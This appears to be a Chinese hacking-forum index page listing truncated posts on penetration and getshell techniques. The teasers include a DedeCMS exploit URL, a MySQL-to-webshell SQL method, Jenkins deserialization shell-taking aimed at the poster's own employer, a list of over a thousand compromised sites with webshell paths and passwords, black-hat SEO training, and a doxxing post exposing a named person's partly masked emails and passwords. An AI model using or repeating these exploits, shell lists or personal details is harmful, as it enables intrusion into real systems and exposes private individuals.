网络渗透漏洞

乌云2016.6.18到2016.7.19漏洞nosec镜像版

0.[C:\Users\brdministrbrtor\Desktop\nosec]下的文件共979个1.10086.cn某重要分站命令执行 _ wooyun-2016-0208510 _NOSEC安全协作平台2.115网盘命令执行漏洞 _...继续阅读 »
网络渗透漏洞

到营业厅修手机,不小心入侵了小米总部

0x00漏洞链接线下测试最终进入小米关键系统(泄露小米售后资料/客户收获地址/联系电话/手机物料清单等)目前仅向厂商以及核心白帽子公开,昨日已经获得小米SRC负责人同意(多少好的思路就这样被法律埋没了)退后退后,洪荒之力...继续阅读 »
网络渗透漏洞

中国黑帽网黑帽SEO培训第三期视频教程公开

教程录制的分辨率比较高,建议在分辨率高的电脑看。如果不清楚。建议使用完美解码播放器:http://jm.wmzhe.com/教程为黑帽网版权所有,严禁恶意买卖,如有被发现者,必将追求其法律责任!还望不良商家注意!...继续阅读 »
网络渗透漏洞

米安公开课WEB攻防安全课程

米安公开课WEB攻防安全课程 1.HTTP协议详解http协议详解(上)http协议详解(中)http协议详解(下)2.Nmap扫描神器详解Nmap详解(上)Nmap详解(中)Nmap详解(下)...继续阅读 »
网络渗透漏洞

逻辑漏洞挖掘入门之 简单的任意账户密码重置

这类逻辑漏洞 就没有停的时候 在WAF越来越普及的时代,SQL注入,远程命令执行这类高危可操作漏洞将越来少,而逻辑漏洞则是目前WAF(很久之后的WAF或许也不能防御)的盲区。所以作为一名合格的黑客,学好逻辑漏洞的挖掘思路,是必须的。逻辑漏洞最常见也是最...继续阅读 »
网络渗透漏洞

[原创]社工某微信公众展示网站持有人信息

http://www.tanliu.cn/邮箱 742****99@qq.com  5134***8@qq.com密码 wan**** 199****  wan*****姓名 王善钟性别 男生日 ...继续阅读 »
网络渗透漏洞

OPenKM文档管理系统getshell尝试

OpenKM简介: OpenKM是一个文档管理系统,用于组织和共享文档。可以通过名称,内容,关键字等来搜索文档。  因为业务需要,工头说我们内部也要整上一个文档管理系统,用于存放搬砖的过程文档。 ...继续阅读 »
网络渗透漏洞

Jenkins拿shell方法

最近一直在学习怎么利用jenkins反序列化,妹的,就是没有一个顺手的GUI工具,能让我直接秒杀服务器。 楼下的小伙伴有好的工具,请给我留言,我要秒了我们公司的jenkins服务器,多谢。。。。 关于反序列化的问题,如果不懂java...继续阅读 »
网络渗透漏洞

mysql如何拿shell

前提需要得到绝对路径! 方法一: CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on`...继续阅读 »
网络渗透漏洞

发一个dedecms的exp,非常实用

访问http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&am...继续阅读 »
网络渗透漏洞

四月十六日更新getshell,共一千一百二十一条

http://ldxy.cn/engver/admin/images/index.asp|zhttp://www.tupian360.com/plus/e7xue.php|e7xuehttp://ldxy.cn/engver/admin/image...继续阅读 »